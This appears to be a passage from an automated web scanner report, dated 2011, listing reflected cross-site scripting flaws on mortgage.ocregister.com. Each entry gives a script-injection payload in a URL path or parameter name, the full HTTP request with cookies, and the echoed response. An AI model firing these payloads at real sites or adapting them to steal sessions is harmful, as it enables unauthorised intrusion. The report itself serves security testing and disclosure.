<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200783bb0\"><script>alert(1)</script>5b51746308e/12/feed/" />
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7553a"><script>alert(1)</script>4b6519fec9b was submitted in the REST URL parameter 2. This input was echoed as 7553a\"><script>alert(1)</script>4b6519fec9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/127553a"><script>alert(1)</script>4b6519fec9b/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/127553a\"><script>alert(1)</script>4b6519fec9b/feed/" />
...[SNIP]...
1.242. http://mortgage.ocregister.com/2007/12/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db24"><script>alert(1)</script>33a184a2162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db24\"><script>alert(1)</script>33a184a2162 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/12/?4db24"><script>alert(1)</script>33a184a2162=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/12/?4db24\"><script>alert(1)</script>33a184a2162=1feed/" />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d30"><script>alert(1)</script>9a1798c9a18 was submitted in the REST URL parameter 1. This input was echoed as 47d30\"><script>alert(1)</script>9a1798c9a18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200847d30"><script>alert(1)</script>9a1798c9a18/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200847d30\"><script>alert(1)</script>9a1798c9a18/01/feed/" />
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de23d"><script>alert(1)</script>2d509002565 was submitted in the REST URL parameter 2. This input was echoed as de23d\"><script>alert(1)</script>2d509002565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/01de23d"><script>alert(1)</script>2d509002565/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01de23d\"><script>alert(1)</script>2d509002565/feed/" />
...[SNIP]...
1.245. http://mortgage.ocregister.com/2008/01/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd34"><script>alert(1)</script>6eeaa914028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fd34\"><script>alert(1)</script>6eeaa914028 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/01/?1fd34"><script>alert(1)</script>6eeaa914028=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01/?1fd34\"><script>alert(1)</script>6eeaa914028=1feed/" />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3080f"><script>alert(1)</script>0eba11e28c7 was submitted in the REST URL parameter 1. This input was echoed as 3080f\"><script>alert(1)</script>0eba11e28c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.